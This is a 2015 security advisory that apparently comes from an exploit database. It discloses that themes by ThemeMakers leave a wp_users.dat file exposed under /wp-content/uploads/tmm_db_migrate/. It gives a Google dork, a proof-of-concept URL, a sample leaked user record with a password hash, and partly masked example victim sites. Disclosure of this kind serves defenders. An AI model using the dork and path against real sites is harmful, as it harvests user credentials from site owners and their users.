WordPress 'ALL Themes' Developed By "ThemeMakers" File Information Exposure

2015.05.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# WordPress 'ALL Themes' Developed By "ThemeMakers" File Information Exposure # CWE: CWE-538 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 15/05/2015 # Vendor Homepage: http://themeforest.net/user/ThemeMakers/portfolio (ALL THEMES) # Google Dork: inurl:/wp-content/uploads/tmm_db_migrate/ # PoC : http://SITE.com/wp-content/uploads/tmm_db_migrate/wp_users.dat Target File: wp_users.dat array ( 0 => array ( 'ID' => '1', 'user_login' => 'xxxxxx', 'user_pass' => '$P$B5GFS1KH2VkkSZhAOAu0MT.XbNtZ1Q0', 'user_nicename' => '', 'user_email' => 'xxxxx@gmail.com', 'user_url' => '', 'user_registered' => '2014-05-06 13:22:47', 'user_activation_key' => '', 'user_status' => '0', 'display_name' => '', ), ) # Examples: http://ibermallXa.com/wp-content/uploads/tmm_db_migrate/wp_users.dat http://bdfotXo.net/wp-content/uploads/tmm_db_migrate/wp_users.dat http://www.cXy-play.com/wp-content/uploads/tmm_db_migrate/wp_users.dat # Themes Probably Affected: Diplomat | Political WordPress Theme Car Dealer / Auto Dealer Responsive WP Theme Invento Responsive Gallery/Architecture Template Accio One Page Parallax Responsive WordPress Theme Accio Responsive Parallax One Page Site Template Axioma Premium Responsive WordPress Theme Almera Responsive Portfolio WordPress Theme Almera Responsive Portfolio Site Template Goodnex Premium Responsive WordPress Theme GamesTheme Premium WordPress Theme Blessing Premium Responsive WordPress Theme SmartIT Premium Responsive WordPress Theme ....


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top